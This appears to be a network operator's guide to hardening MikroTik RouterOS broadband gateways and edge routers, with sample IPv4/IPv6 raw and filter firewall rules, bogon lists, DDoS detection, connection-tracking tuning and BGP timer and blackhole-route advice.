• Net Neutrality Violations
• Such as blocking TCP/UDP traffic destined towards Cloudflare or Google Anycast DNS
• Lacks basic DDoS protection
• Lacks simple bogon filtering
• Lacks basic rules such as dropping invalid traffic on the input chain
• Lacks FastTracking for traffic destined towards your NATted pools
• Connection tracking of customers having a public IPv4 address makes no sense and wastes CPU cycles
• Incorrect ICMPv4/ICMPv6 filtering rules such as rate limiting fragmentation needed and then wonders why customers are facing strange issues with regards to PMTUD
Solutions
• Remove most “port blocking” rules
• Customer Site security should be handled on the customer site such as having proper basic firewalling on their Edge Routers
• I’ve dropped some ports on the RAW table directly
• Avoid Net Neutrality Violation unless otherwise enforced by your local state or central government
• I’ve shared the rule for FastTracking NATted pools
• I’ve shared the rule for reducing connection tracking impact on customers having public IPv4 address
• I have crafted ICMPv4/ICMPv6 manually to drop all deperecated ICMP types while accepting all valid ICMP types
Below are the generic firewall rules that should be deployed on the BNG to cover basic security grounds.
IPv4 Firewall
#First we take care of address lists#
/ip firewall address-list
#Enter all local subnets/public subnets applicable to your AS for the specific BNG where you've routed pools for use#
#Example I'm using only a /24 public+private pools for this specific BNG#
add address=103.176.189.0/24 comment="Public Pool" list=lan_subnets
add address=192.168.0.0/24 comment="Local interfaces" list=lan_subnets
#The usual CGNAT pool entire range#
add address=100.64.0.0/10 comment="CGNAT Pool" list=lan_subnets
#Here we will enter the public pool used for giving customers public IP addresses directly, this will be used for no-tracking to boost performance of customers having public IPv4 addresses and reduce load on the CPU of the BNG#
add address=103.176.189.0/25 comment="Public Pool" list=public_subnets
###Required for DDoS protection rules###
add list=ddos-attackers
add list=ddos-targets
###Bogon filtering addresses for each of the rules in RAW/Filter###
add address=0.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=172.16.0.0/12 comment=RFC6890 list=not_in_internet
add address=192.168.0.0/16 comment=RFC6890 list=not_in_internet
add address=10.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=169.254.0.0/16 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=224.0.0.0/4 comment=Multicast list=not_in_internet
add address=198.18.0.0/15 comment=RFC6890 list=not_in_internet
add address=192.0.0.0/24 comment=RFC6890 list=not_in_internet
add address=192.0.2.0/24 comment=RFC6890 list=not_in_internet
add address=198.51.100.0/24 comment=RFC6890 list=not_in_internet
add address=203.0.113.0/24 comment=RFC6890 list=not_in_internet
add address=100.64.0.0/10 comment=RFC6890 list=not_in_internet
add address=240.0.0.0/4 comment=RFC6890 list=not_in_internet
add address=192.88.99.0/24 comment="6to4 relay Anycast [RFC 3068]" list=not_in_internet
add address=255.255.255.255 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.0.0/24 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.2.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=198.51.100.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=203.0.113.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=240.0.0.0/4 comment="RAW Filtering - RFC6890 reserved" list=bad_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_src_ipv4
add address=255.255.255.255 comment="RAW Filtering - RFC6890" list=bad_src_ipv4
add address=0.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_dst_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_dst_ipv4 disabled=yes
/ip firewall raw
add action=drop chain=prerouting comment="Drop DDoS src and dst address list" dst-address-list=ddos-targets src-address-list=ddos-attackers
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=tcp
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=udp
#Required at least in India to reduce call spam/scam#
add action=drop chain=prerouting comment="Drop outgoing SIP to block call centre scammers" port=5060,5061 protocol=tcp
add action=drop chain=prerouting comment="Drop outgoing SIP to block call centre scammers" port=5060,5061 protocol=udp
add action=accept chain=prerouting comment="Enable this rule for transparent mode" disabled=yes
#If you are using DHCP, change this to accept#
add action=drop chain=prerouting comment="defconf: Drop DHCP discover" dst-address=255.255.255.255 dst-port=67 in-interface-list=LAN protocol=udp src-address=0.0.0.0 src-port=68
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_src_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_dst_ipv4
add action=drop chain=prerouting comment="defconf: drop non global from WAN" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="defconf: drop forward to private ranges from WAN" dst-address-list=not_in_internet in-interface-list=WAN
#Remember to properly enter all subnets in the lan_subnet list for both your AS public IPv4 blocks and CGNAT/local subnets#
add action=drop chain=prerouting comment="defconf: drop local if not from default IP range" in-interface-list=LAN src-address-list=!lan_subnets
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=jump chain=prerouting comment="defconf: jump to TCP chain" jump-target=bad_tcp protocol=tcp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmp protocol=icmp
#Rule for reducing connection tracking impact for public IPv4 customers, we no longer exlucde RFC6890 bound packets as the route to blackhole rules takes care of that#
add action=notrack chain=prerouting comment="Reduce load on conn_track" in-interface-list=LAN src-address-list=public_subnets
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=bad_tcp comment="defconf: TCP port 0 drop" port=0 protocol=tcp
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=!fin,!syn,!rst,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,syn
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,urg
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=syn,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=rst,urg
add action=drop chain=icmp comment="Drop Source Quench (Deprecated)" icmp-options=4 protocol=icmp
add action=drop chain=icmp comment="Drop Alternate Host Address (Deprecated)" icmp-options=6 protocol=icmp
add action=drop chain=icmp comment="Drop Information Request (Deprecated)" icmp-options=15 protocol=icmp
add action=drop chain=icmp comment="Drop Information Reply (Deprecated)" icmp-options=16 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Request (Deprecated)" icmp-options=17 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Reply (Deprecated)" icmp-options=18 protocol=icmp
add action=drop chain=icmp comment="Drop Traceroute (Deprecated)" icmp-options=30 protocol=icmp
add action=drop chain=icmp comment="Drop Datagram Conversion Error (Deprecated)" icmp-options=31 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Host Redirect (Deprecated)" icmp-options=32 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 Where-Are-You (Deprecated)" icmp-options=33 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 I-Am-Here (Deprecated)" icmp-options=34 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Request (Deprecated)" icmp-options=35 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Reply (Deprecated)" icmp-options=36 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Request (Deprecated)" icmp-options=37 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Reply (Deprecated)" icmp-options=38 protocol=icmp
add action=drop chain=icmp comment="Drop SKIP (Deprecated)" icmp-options=39 protocol=icmp
/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMP after RAW" protocol=icmp
add action=accept chain=input comment="defconf: accept UDP traceroute" port=33434-33534 protocol=udp
#Example to allow access to router's ports from all interfaces LAN/WAN#
add action=accept chain=input comment="Accept Winbox TCP" dst-port=65000 protocol=tcp
add action=accept chain=input comment="Accept API TCP" dst-port=8728 protocol=tcp
add action=accept chain=input comment="Accept API UDP" dst-port=8728 protocol=udp
add action=accept chain=input comment="Accept SNMP for internal use" dst-port=161 protocol=udp
add action=accept chain=input comment="Accept RADIUS UDP" dst-port=1700,1812,1813 protocol=udp
add action=accept chain=input comment="Accept RADIUS TCP" dst-port=1700,1812,1813 protocol=tcp
#End of example#
add action=drop chain=input comment="defconf: drop all not coming from LAN's interface list/subnets" in-interface-list=!LAN
#PPPoE Clients are excluded as to not bypass queues, if using DHCP excluded src and dst address list of customer pool#
add action=fasttrack-connection chain=forward comment="Rule for NAT Accelaration behaviour (Will reduce CPU usage for NATted traffic)" in-interface=!all-ppp out-interface=!all-ppp
add action=accept chain=forward comment="allow already established connections" connection-state=established,related,untracked
add action=jump chain=forward comment="Jump to DDoS detection" connection-state=new in-interface-list=WAN jump-target=detect-ddos
add action=return chain=detect-ddos dst-limit=50,50,src-and-dst-addresses/10s
add action=add-dst-to-address-list address-list=ddos-targets address-list-timeout=10m chain=detect-ddos
add action=add-src-to-address-list address-list=ddos-attackers address-list-timeout=10m chain=detect-ddos
#This rule should be redudant as we are now routing RFC6890 to blackhole directly and hence I am commenting it out#
#add action=drop chain=forward comment="Drop tries to reach not public addresses from LAN" dst-address-list=not_in_internet in-interface-list=LAN out-interface-list=WAN#
IPv6 Firewall
I have now added a rule in the raw table to drop header 0, 43 as per this, now the linked article also suggests dropping header 60, but I decided to not drop header 60 for reasons stated in the re-tweet here – Please note, this only works in ROS v7.4 onwards as there is a bug that was fixed in that version and going forward.
I have now also removed the forward rules completely to improve performance and moved them to the raw table.
/ipv6 firewall address-list
#Enter all the public prefixes that you've routed to this particular BNG#
#We will use this to block spoofed IPv6 coming from customers#
#We will also use this for no-tracking to boost performance of customers having behind the public IPv6 addresses and reduce load on the CPU of the BNG#
#example#
add address=2405:a140:8::/46 comment="CPE-LAN-Pool" list=lan_subnets
add address=2405:a140:c::/54 comment="CPE-WAN-Pool" list=lan_subnets
#Example of any IPv6 you're using on the BNG towards downstream switches/devices/VMs etc#
add address=2405:a140:e::/48 comment="Backbone-Pool" list=lan_subnets
#To prevent breaking link-local#
add address=fe80::/10 comment="Link-local" list=lan_subnets
#Add your BGP peers here, example below#
add address=2400:7000:1::/126 comment="Peering with Transit on VLAN100" list=bgp_peers
#Copy Paste all the following#
add address=::/3 comment="IPv6 invalids" list=not_in_internet
add address=4000::/3 comment="IPv6 invalids" list=not_in_internet
add address=6000::/3 comment="IPv6 invalids" list=not_in_internet
add address=8000::/3 comment="IPv6 invalids" list=not_in_internet
add address=a000::/3 comment="IPv6 invalids" list=not_in_internet
add address=c000::/3 comment="IPv6 invalids" list=not_in_internet
add address=e000::/4 comment="IPv6 invalids" list=not_in_internet
add address=f000::/5 comment="IPv6 invalids" list=not_in_internet
add address=f800::/6 comment="IPv6 invalids" list=not_in_internet
add address=fc00::/7 comment="IPv6 invalids" list=not_in_internet
add address=fe00::/9 comment="IPv6 invalids" list=not_in_internet
add address=fec0::/10 comment="IPv6 invalids" list=not_in_internet
add address=2001::/23 comment="IPv6 invalids" list=not_in_internet
add address=2001:2::/48 comment="IPv6 invalids" list=not_in_internet
add address=2001:10::/28 comment="IPv6 invalids" list=not_in_internet
add address=2001:db8::/32 comment="IPv6 invalids" list=not_in_internet
add address=2002::/16 comment="IPv6 invalids" list=not_in_internet
add address=3ffe::/16 comment="IPv6 invalids" list=not_in_internet
#We will use this to eliminate the need for stateful firewalling on IPv6 to catch spoofed traffic in the raw table instead of forward chain#
add address=2000::/3 list="global_unicast_prefix(es)"
add address=fe80::/10 list=allowed
add address=ff02::/16 comment="multicast" list=allowed
add address=fe80::/10 comment="defconf: RFC6890 Linked-Scoped Unicast" list=no_forward_ipv6
add address=ff00::/8 comment="defconf: multicast" list=no_forward_ipv6
add address=::1/128 comment="defconf: lo" list=bad_ipv6
add address=::ffff:0:0/96 comment="defconf: ipv4-mapped" list=bad_ipv6
add address=::/96 comment="defconf: ipv4 compat" list=bad_ipv6
add address=2001:db8::/32 comment="defconf: documentation" list=bad_ipv6
add address=2001:10::/28 comment="defconf: ORCHID" list=bad_ipv6
add address=2001::/23 comment="defconf: RFC6890" list=bad_ipv6
add address=::/128 comment="defconf: unspecified" list=bad_dst_ipv6
add address=::/128 comment="RAW Filtering" list=bad_src_ipv6
add address=ff00::/8 comment="RAW Filtering" list=bad_src_ipv6
/ipv6 firewall raw
#New rule to drop deprecated header type 0 & 40#
#Works only on ROS v7.4 onwards#
add action=drop chain=prerouting comment="Drop packets with extension header types 0, 43" headers=hop,route:contains
add action=accept chain=prerouting comment="defconf: RFC4291, section 2.7.1" dst-address=ff02::1:ff00:0/104 icmp-options=135:0-255 protocol=icmpv6 src-address=::/128
#Migrated this rule from the foward chain to make it more CPU efficient#
add action=drop chain=prerouting comment="defconf: rfc4890 drop hop-limit=1" hop-limit=equal:1 in-interface-list=!LAN protocol=icmpv6
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=tcp
add action=drop chain=prerouting comment="drop port 25 to prevent spam" port=25 protocol=udp
#This is required for traffic whereby the SRC may be Link-local and the DST is GUA for BGP peers particuarly in IXPs#
add action=accept chain=prerouting comment="Accept all ICMPv6 traffic from BGP peers (Required for LL<>GUA packets)" icmp-options=!154:4-5 in-interface-list=WAN protocol=icmpv6 src-address-list=bgp_peers
add action=drop chain=prerouting comment="Drop invalids from WAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from WAN" dst-address-list=not_in_internet in-interface-list=WAN src-address-list="global_unicast_prefix(es)"
add action=drop chain=prerouting comment="Drop invalids from LAN" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="Drop forwarded invalids from LAN" dst-address-list=not_in_internet in-interface-list=LAN src-address-list=lan_subnets
#This rule replaces the need for forward chain rule for doing the same thing#
add action=drop chain=prerouting comment="Drop spoofed traffic from LAN going towards Global Unicast" dst-address-list="global_unicast_prefix(es)" in-interface-list=LAN src-address-list=!lan_subnets
add action=accept chain=prerouting comment="defconf: enable for transparent firewall" disabled=yes
add action=drop chain=prerouting comment="defconf: drop bogon IP's" src-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop bogon IP's" dst-address-list=bad_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad src ipv6" src-address-list=bad_src_ipv6
add action=drop chain=prerouting comment="defconf: drop packets with bad dst ipv6" dst-address-list=bad_dst_ipv6
add action=accept chain=prerouting comment="defconf: accept local multicast scope" dst-address=ff02::/16
add action=drop chain=prerouting comment="defconf: drop other multicast destinations" dst-address=ff00::/8
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=drop chain=prerouting comment="defconf: drop bad TCP" port=0 protocol=tcp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmpv6 protocol=icmpv6
#Since all filtering for LAN is done in RAW, we do not need to have stateful tracking for LAN, and hence we are notracking all LAN originating/bound traffic after filtering#
add action=notrack chain=output comment="Reduce load on conn_track" in-interface-list=LAN
add action=notrack chain=output comment="Reduce load on conn_track" out-interface-list=LAN
add action=notrack chain=prerouting comment="Reduce load on conn_track" in-interface-list=LAN
add action=notrack chain=prerouting comment="Reduce load on conn_track" dst-address-list=lan_subnets in-interface-list=WAN
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=icmpv6 comment="Drop FMIPv6 HI + FMIPv6 HAck - Deprecated (RFC5568)" icmp-options=154:4-5 protocol=icmpv6
/ipv6 firewall filter
add action=accept chain=input comment="defconf: accept established,related,untracked" connection-state=established,related,untracked
add action=drop chain=input comment="defconf: drop invalid" connection-state=invalid
add action=accept chain=input comment="defconf: accept ICMPv6" protocol=icmpv6
add action=accept chain=input comment="defconf: accept UDP traceroute" port=33434-33534 protocol=udp
add action=accept chain=input comment="defconf: accept DHCPv6-Client prefix delegation." dst-port=546 protocol=udp src-address=fe80::/10
#Example to allow access to router's ports from all interfaces LAN/WAN#
add action=accept chain=input comment="Accept Winbox TCP" dst-port=65000 protocol=tcp
add action=accept chain=input comment="Accept API TCP" dst-port=8728 protocol=tcp
add action=accept chain=input comment="Accept API UDP" dst-port=8728 protocol=udp
add action=accept chain=input comment="Accept SNMP for internal use" dst-port=161 protocol=udp
add action=accept chain=input comment="Accept RADIUS UDP" dst-port=1700,1812,1813 protocol=udp
add action=accept chain=input comment="Accept RADIUS TCP" dst-port=1700,1812,1813 protocol=tcp
#End of example#
add action=accept chain=input comment="allow allowed addresses" src-address-list=allowed
add action=drop chain=input comment="defconf: drop everything else not coming from LAN" in-interface-list=!LAN
#All forward rules have been migrated to the RAW table for BNGs, so better performance and no stateful tracking required for customers#
For Edge Router
The purpose of the Edge router is to route as fast as possible. So, with that in mind, along with the basic general changes I’ve mentioned at the beginning of this article, the following should also be kept in mind:
1. No NAT
2. No connection tracking aka stateful firewalling (filter table on the firewall section)
• If you enable stateful firewalling on the edge, the router will die in case of DDoS attacks or even just heavy traffic in general
3. No fancy “features” (like Hotspot, PPPoE)
• Use your BNG routers for any customer delegation that is required
BGP Optimisation
This is a work in progress section and at this point in time, I am writing based on my experience with Indian ISPs, so if you’re in the EU/US or other locations, you’re probably already implementing the following:
Please note on RouterOS v7, you need to properly configure BGP affinity to avoid CPU issues.
BGP Timers
Based on Huawei documentation here and here, I personally tested the following configuration and observed that BGP negotiation time and stability (during occasional link flaps/packet loss) improved significantly, so I would recommend network operators to set the same timers globally on their networks (for both eBGP and iBGP) – Keepalive time to 20s, Holdtime to 60s.
• /routing bgp template
set default as=149794 disabled=no hold-time=1m keepalive-time=20s
Preferably convince your peers to do the same config on their end as well at least for the individual BGP sessions that are between you and them.
Traffic Engineering and loop prevention
• Always route your aggregated prefixes [Like say you have a /24 or /22 (IPv4) or /32 or /36 (IPv6)] to blackhole for IPv4+IPv6 to prevent layer 3 looping and stop disabling synchronisation on RouterOS v6, it is anyways mandatory on RouterOS v7 to either route to blackhole or have the prefix assigned to an interface
• This will also reduce CPU usage whenever downstream routers/users/switches go offline and incomplete traffic from remote hosts/networks keeps trying to establish a connection and since it gets routed to blackhole it will immediately timeout and save resources.
• In other words, there’s no sense in doing things that increase CPU usage (not routing to blackhole)
• And there is no sense in avoiding loop prevention mechanisms
• Example config on my own network (AS149794) on RouterOS v7
/ip route
add blackhole comment="Blackhole route" disabled=no dst-address=103.176.189.0/24
/ipv6 route
add blackhole comment="Blackhole Route" disabled=no dst-address=2400:7060::/32
add blackhole comment="Blackhole Route" disabled=no dst-address=2400:7060::/48
• If you have multi-homing transit
• Always at the very least, request for partial routing table from all the upstream providers you’re connected to. If the router can handle full tables from the upstreams, go for it!
• This will ensure your router has the best paths to choose from
• Stop going with the strange concept of taking only default routes from the upstreams and creating asymmetric routing conditions where outgoing traffic is going via Transit A and incoming traffic is coming in via Transit B.
• Always advertise all your IP pools to all transit providers to help minimise asymmetric routing which in turn leads to high latency and possibly packet loss in rare cases
• If you need traffic engineering, you can consider BGP based load balancing or local preferences with some automation like Pathvector
• If you have a single homing setup
• Still request for partial table/full table whichever fits your router’s specs in order to futureproof in case you plan to go multi-home
Filtering & Security
We only need to do broadly two things for filtering and security:
1. Implement MANRS throughout your network (and business)
2. Use the RAW table to drop remaining bogon/rubbish traffic similar to the one used on the BNG and you can also use it for ACL if you need that
• CPU usage stays minimal when using the RAW table
• Absolutely nothing on the filter table i.e. no stateful firewalling
• The only exception here is we can use FastTrack for untracked traffic i.e. stateless traffic to improve IPv4 routing performance
IPv4 Firewall
#Disable conn_track for using FastTrack statelessly#
/ip firewall connection tracking
set enabled=no
/ip firewall address-list
#Enter all local subnets/public subnets applicable to your AS, use the full CIDR notation of the public IPv4 block assigned to you to avoid missing anything out, please avoid something like /30#
add address=103.176.189.0/24 comment="LAN subnets" list=lan_subnets
add address=192.168.0.0/24 comment="LAN subnets" list=lan_subnets
add address=0.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=172.16.0.0/12 comment=RFC6890 list=not_in_internet
add address=192.168.0.0/16 comment=RFC6890 list=not_in_internet
add address=10.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=169.254.0.0/16 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment=RFC6890 list=not_in_internet
add address=224.0.0.0/4 comment=Multicast list=not_in_internet
add address=198.18.0.0/15 comment=RFC6890 list=not_in_internet
add address=192.0.0.0/24 comment=RFC6890 list=not_in_internet
add address=192.0.2.0/24 comment=RFC6890 list=not_in_internet
add address=198.51.100.0/24 comment=RFC6890 list=not_in_internet
add address=203.0.113.0/24 comment=RFC6890 list=not_in_internet
add address=100.64.0.0/10 comment=RFC6890 list=not_in_internet
add address=240.0.0.0/4 comment=RFC6890 list=not_in_internet
add address=192.88.99.0/24 comment="6to4 relay Anycast [RFC 3068]" list=not_in_internet
add address=255.255.255.255 comment=RFC6890 list=not_in_internet
add address=127.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.0.0/24 comment="RAW Filtering - RFC6890" list=bad_ipv4
add address=192.0.2.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=198.51.100.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=203.0.113.0/24 comment="RAW Filtering - RFC6890 documentation" list=bad_ipv4
add address=240.0.0.0/4 comment="RAW Filtering - RFC6890 reserved" list=bad_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_src_ipv4
add address=255.255.255.255 comment="RAW Filtering - RFC6890" list=bad_src_ipv4
add address=0.0.0.0/8 comment="RAW Filtering - RFC6890" list=bad_dst_ipv4
add address=224.0.0.0/4 comment="RAW Filtering - multicast" list=bad_dst_ipv4 disabled=yes
/ip firewall raw
add action=accept chain=prerouting comment="Enable this rule for transparent mode" disabled=yes
#If you are using DHCP, change this to accept#
add action=drop chain=prerouting comment="defconf: Drop DHCP discover on LAN" dst-address=255.255.255.255 dst-port=67 in-interface-list=LAN protocol=udp src-address=0.0.0.0 src-port=68
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_ipv4
add action=drop chain=prerouting comment="defconf: drop bad src IPs" src-address-list=bad_src_ipv4
add action=drop chain=prerouting comment="defconf: drop bad dst IPs" dst-address-list=bad_dst_ipv4
add action=drop chain=prerouting comment="defconf: drop non global from WAN" in-interface-list=WAN src-address-list=not_in_internet
add action=drop chain=prerouting comment="defconf: drop forward to private ranges from WAN" dst-address-list=not_in_internet in-interface-list=WAN
#Remember that lan_subnets here should only include your public ranges not CGNAT#
add action=drop chain=prerouting comment="defconf: drop local if not from default IP range" in-interface-list=LAN src-address-list=!lan_subnets
add action=drop chain=prerouting comment="defconf: drop bad UDP" port=0 protocol=udp
add action=jump chain=prerouting comment="defconf: jump to TCP chain" jump-target=bad_tcp protocol=tcp
add action=jump chain=prerouting comment="defconf: jump to ICMP chain" jump-target=icmp protocol=icmp
add action=accept chain=prerouting comment="defconf: accept UDP traceroute" dst-address-type=local port=33434-33534 protocol=udp
add action=accept chain=prerouting comment="defconf: accept everything else from LAN" in-interface-list=LAN
add action=accept chain=prerouting comment="defconf: accept everything else from WAN" in-interface-list=WAN
add action=accept chain=prerouting comment="Accept local traffic to self" src-address-type=local
add action=drop chain=prerouting comment="defconf: drop the rest"
add action=drop chain=bad_tcp comment="defconf: TCP port 0 drop" port=0 protocol=tcp
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=!fin,!syn,!rst,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,syn
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,!ack
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=fin,urg
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=syn,rst
add action=drop chain=bad_tcp comment="defconf: TCP flag filter" protocol=tcp tcp-flags=rst,urg
add action=drop chain=icmp comment="Drop Source Quench (Deprecated)" icmp-options=4 protocol=icmp
add action=drop chain=icmp comment="Drop Alternate Host Address (Deprecated)" icmp-options=6 protocol=icmp
add action=drop chain=icmp comment="Drop Information Request (Deprecated)" icmp-options=15 protocol=icmp
add action=drop chain=icmp comment="Drop Information Reply (Deprecated)" icmp-options=16 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Request (Deprecated)" icmp-options=17 protocol=icmp
add action=drop chain=icmp comment="Drop Address Mask Reply (Deprecated)" icmp-options=18 protocol=icmp
add action=drop chain=icmp comment="Drop Traceroute (Deprecated)" icmp-options=30 protocol=icmp
add action=drop chain=icmp comment="Drop Datagram Conversion Error (Deprecated)" icmp-options=31 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Host Redirect (Deprecated)" icmp-options=32 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 Where-Are-You (Deprecated)" icmp-options=33 protocol=icmp
add action=drop chain=icmp comment="Drop IPv6 I-Am-Here (Deprecated)" icmp-options=34 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Request (Deprecated)" icmp-options=35 protocol=icmp
add action=drop chain=icmp comment="Drop Mobile Registration Reply (Deprecated)" icmp-options=36 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Request (Deprecated)" icmp-options=37 protocol=icmp
add action=drop chain=icmp comment="Drop Domain Name Reply (Deprecated)" icmp-options=38 protocol=icmp
add action=drop chain=icmp comment="Drop SKIP (Deprecated)" icmp-options=39 protocol=icmp
#Filter rules for FastTracking stateless traffic#
/ip firewall mangle
add action=fasttrack-connection chain=prerouting
add action=fasttrack-connection chain=output
IPv6 Firewall
/ipv6 firewall address-list
#Enter the aggregated public prefixes originating from your AS that you use along with link-local fe80::/10#
#example#
add address=2405:a140::/32 comment="AS Prefix" list=lan_subnets
add address=fe80::/10 comment="Link-local" list=lan_subnets
#Add your BGP peers here, example below#
add address=2400:7000:1::/126 comment="Peering with Transit on VLAN100" list=bgp_peers
#Copy Paste all the following#
add address=::/3 comment="IPv6 invalids" list=not_in_internet
add address=4000::/3 comment="IPv6 invalids" list=not_in_internet
add address=6000::/3 comment="IPv6 invalids" list=not_in_internet
add address=8000::/3 comment="IPv6 invalids" list=not_in_internet
add address=a000::/3 comment="IPv6 invalids" list=not_in_internet
add address=c000::/3 comment="IPv6 invalids" list=not_in_internet
add address=e000::/4 comment="IPv6 invalids" list=not_in_internet
add address=f000::/5 comment="IPv6 invalids" list=not_in_internet
add address=f800::/6 comment="IPv6 invalids" list=not_in_internet
add address=fc00::/7 comment="IPv6 invalids" list=not_in_internet
add address=fe00::/9 comment="IPv6 invalids" list=not_in_internet
add address=fec0::/10 comment="IPv6 invalids" list=not_in_internet
add address=2001::/23 comment="IPv6 invalids" list=not_in_internet
add address=2001:2::/48 comment="IPv6 invalids" list=not_in_internet
add address=2001:10::/28 comment="IPv6 invalids" list=not_in_internet
add address=2001:db8::/32 comment="IPv6 invalids" list=not_in_internet
add address=2002::/16 comment="IPv6 invalids" list=not_in_internet
add address=3ffe::/16 comment="IPv6 invalids" list=not_in_internet
add address=2000::/3 list="global_unicast_prefix(es)"
add address=fe80::/10 list=allowed
add address=ff02::/16 comment="multicast" list=allowed
add address=fe80::/10 comment="defconf: RFC6890 Linked-Scoped Unicast" list=no_forward_ipv6
add address=ff00::/8 comment="defconf: multicast" list=no_forward_ipv6
add address=::1/128 comment="defconf: lo" list=bad_ipv6
add address=::ffff:0:0/96 comment="defconf: ipv4-mapped" list=bad_ipv6
add address=::/96 comment="defconf: ipv4 compat" list=bad_ipv6
add address=2001:db8::/32 comment="defconf: documentation" list=bad_ipv6
add address=2001:10::/28 comment="defconf: ORCHID" list=bad_ipv6
add address=2001::/23 comment="defconf: RFC6890" list=bad_ipv6
add address=::/128 comment="defconf: unspecified" list=bad_dst_ipv6
add address=::/128 comment="RAW Filtering" list=bad_src_ipv6
add address=ff00::/8 comment="RAW Filtering" list=bad_src_ipv6
/ipv6 firewall raw
#New rule to drop deprecated header type 0 & 40#
#Works only on ROS v7.4 onwards#
add action=drop chain=prerouting comment="Drop packets with extension header types 0, 43 at network border" headers=hop,route:contains
add action=accept chain=prerouting comment="defconf: RFC4291, section 2.7.1" dst-address=ff02::1:ff00:0/104 icmp-options=135:0-255 protocol=icmpv6 src-address=::/128
#Migrated this rule from the foward chain in BNG to drop these packets on the network edge#
add action=drop chain=prerouting comment="defconf: rfc4890 drop hop-limit=1" hop-limit=equal:1 in-interface-list=!LAN protocol=icmpv6
